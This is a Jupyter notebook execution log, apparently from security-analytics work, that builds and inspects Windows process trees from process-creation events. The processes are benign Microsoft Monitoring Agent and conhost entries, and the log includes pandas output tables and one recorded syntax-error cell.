\nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 850.0 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 984.0 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 738.0 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 736.0 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 887.0 \n\n ProcessId_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 0x864 \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 0x864 \n\n NewProcessName_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... C:\\Program Files\\Microsoft Monitoring Agent\\Ag... \n\n TimeGenerated_orig_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaT \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.256999936 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 2019-02-09 23:22:56.256999936 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 2019-02-09 23:32:56.260000000 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 2019-02-10 00:02:56.256999936 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 2019-02-10 00:12:56.252999936 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 2019-02-10 00:32:56.270000128 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 2019-02-09 21:32:56.270000128 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 2019-02-09 20:32:56.260000000 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 2019-02-09 22:02:56.263000064 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 2019-02-09 22:32:56.247000064 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 2019-02-09 22:32:56.260000000 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000000000 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 2019-02-09 20:52:56.260000000 \n\n parent_key \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... c:\\program files\\microsoft monitoring agent\\ag... \n\n IsRoot IsLeaf IsBranch \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... True False False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... False True False \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... False True False \n\n path parent_index \nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1004 NaN \nc:\\program files\\microsoft monitoring agent\\age... 1004/10 1004 \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 1004/10/11 10 \nc:\\program files\\microsoft monitoring agent\\age... 1004/107 1004 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 1004/107/108 107 \nc:\\program files\\microsoft monitoring agent\\age... 1004/120 1004 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 1004/120/121 120 \nc:\\program files\\microsoft monitoring agent\\age... 1004/127 1004 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 1004/127/128 127 \nc:\\program files\\microsoft monitoring agent\\age... 1004/129 1004 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 1004/129/130 129 \nc:\\program files\\microsoft monitoring agent\\age... 1004/139 1004 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 1004/139/140 139 \nc:\\program files\\microsoft monitoring agent\\age... 1004/15 1004 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 1004/15/16 15 \nc:\\program files\\microsoft monitoring agent\\age... 1004/5 1004 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 1004/5/6 5 \nc:\\program files\\microsoft monitoring agent\\age... 1004/67 1004 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 1004/67/68 67 \nc:\\program files\\microsoft monitoring agent\\age... 1004/76 1004 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 1004/76/77 76 \nc:\\program files\\microsoft monitoring agent\\age... 1004/78 1004 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 1004/78/79 78 \nc:\\program files\\microsoft monitoring agent\\age... 1004/8 1004 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 1004/8/9 8 \n\n[25 rows x 35 columns]" }, "execution_count": 5, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "s_tree" }, "executionTime": "2019-12-13T20:28:22.067Z" }, { "cell": { "executionCount": 6, "executionEventId": "7c1feb49-b292-4a3a-aa57-1698f0ba5e4e", "hasError": false, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "data": { "text/plain": "25" }, "execution_count": 6, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "ptutil.get_descendents(p_tree, ptutil.get_roots(p_tree).iloc[4])\nlen(s_tree)" }, "executionTime": "2019-12-13T20:29:01.543Z" }, { "cell": { "executionCount": 7, "executionEventId": "d5d66c70-7124-4f08-8775-e833125c085e", "hasError": false, "id": "5610ff3a-83b0-4253-92bb-feba160df533", "outputs": [ { "data": { "text/plain": "13" }, "execution_count": 7, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "3961bef2-e361-4a29-8f22-e92096d739a8", "text": "t_root = ptutil.get_roots(p_tree).iloc[4]\nfull_tree = ptutil.get_descendents(p_tree, t_root)\nassert len(s_tree) == 25\nchildren = ptutil.get_children(p_tree, t_root)\nlen(children)" }, "executionTime": "2019-12-13T20:31:12.416Z" }, { "cell": { "executionCount": 8, "executionEventId": "1a560730-48b3-48a1-b69a-ebb6b2683f36", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/plain": "proc_key\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000 6\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000 6\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000 7\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000 7\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000 7\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000 7\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000 7\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000 8\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000 8\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000 8\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000 8\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000 8\nc:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000 4\nName: path, dtype: int64" }, "execution_count": 8, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "children[\"path\"].str.len()" }, "executionTime": "2019-12-13T20:37:32.652Z" }, { "cell": { "executionCount": 9, "executionEventId": "f12d954e-d246-4b2d-90b8-21665078f11e", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/plain": "proc_key\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000 1\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000 1\nc:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000 0\nName: path, dtype: int64" }, "execution_count": 9, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "children[\"path\"].str.count(\"/\")" }, "executionTime": "2019-12-13T20:38:08.917Z" }, { "cell": { "executionCount": 10, "executionEventId": "42a4396e-cb4f-47d3-8ed2-f2cae8fa3a4e", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/plain": "proc_key\nc:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000 0\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000 1\nc:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000 1\nc:\\windows\\system32\\conhost.exe0x21c82019-02-09 23:22:56.267000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000 1\nc:\\windows\\system32\\conhost.exe0x1c242019-02-09 23:32:56.280000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000 1\nc:\\windows\\system32\\conhost.exe0x17a42019-02-10 00:02:56.270000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000 1\nc:\\windows\\system32\\conhost.exe0x1c102019-02-10 00:12:56.263000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000 1\nc:\\windows\\system32\\conhost.exe0x235c2019-02-10 00:32:56.287000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000 1\nc:\\windows\\system32\\conhost.exe0x14682019-02-09 21:32:56.290000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000 1\nc:\\windows\\system32\\conhost.exe0x12782019-02-09 20:32:56.280000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000 1\nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 22:02:56.277000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000 1\nc:\\windows\\system32\\conhost.exe0x18342019-02-09 22:32:56.260000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000 1\nc:\\windows\\system32\\conhost.exe0x15f42019-02-09 22:32:56.273000 2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000 1\nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 20:52:56.270000 2\nName: path, dtype: int64" }, "execution_count": 10, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "full_tree[\"path\"].str.count(\"/\")" }, "executionTime": "2019-12-13T20:38:24.603Z" }, { "cell": { "executionCount": 11, "executionEventId": "368a67e1-bb9f-4fa6-88b1-c8c7b5454808", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/plain": "2" }, "execution_count": 11, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "full_tree[\"path\"].str.count(\"/\").max()" }, "executionTime": "2019-12-13T20:39:04.083Z" }, { "cell": { "executionCount": 12, "executionEventId": "55384d35-db28-4bcc-afc2-1a97266751ad", "hasError": true, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "ename": "SyntaxError", "evalue": "invalid syntax (, line 2)", "output_type": "error", "traceback": [ "\u001b[1;36m File \u001b[1;32m\"\"\u001b[1;36m, line \u001b[1;32m2\u001b[0m\n\u001b[1;33m full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1]\u001b[0m\n\u001b[1;37m ^\u001b[0m\n\u001b[1;31mSyntaxError\u001b[0m\u001b[1;31m:\u001b[0m invalid syntax\n" ] } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "depth = fulltree(full_tree[\"path\"].str.count(\"/\").max()\nfull_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1]" }, "executionTime": "2019-12-13T20:43:33.070Z" }, { "cell": { "executionCount": 13, "executionEventId": "e51ab04f-57db-43bf-85d0-8085425efc5f", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x8dc...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/101004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:22:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xd74...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1071004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x6f8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1201004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.25700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:02:56.257MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1fc0...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1271004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.25300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:12:56.253MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x10bc...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1291004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xb48...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/1391004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:32:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xbd0...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/151004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x15c8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/51004
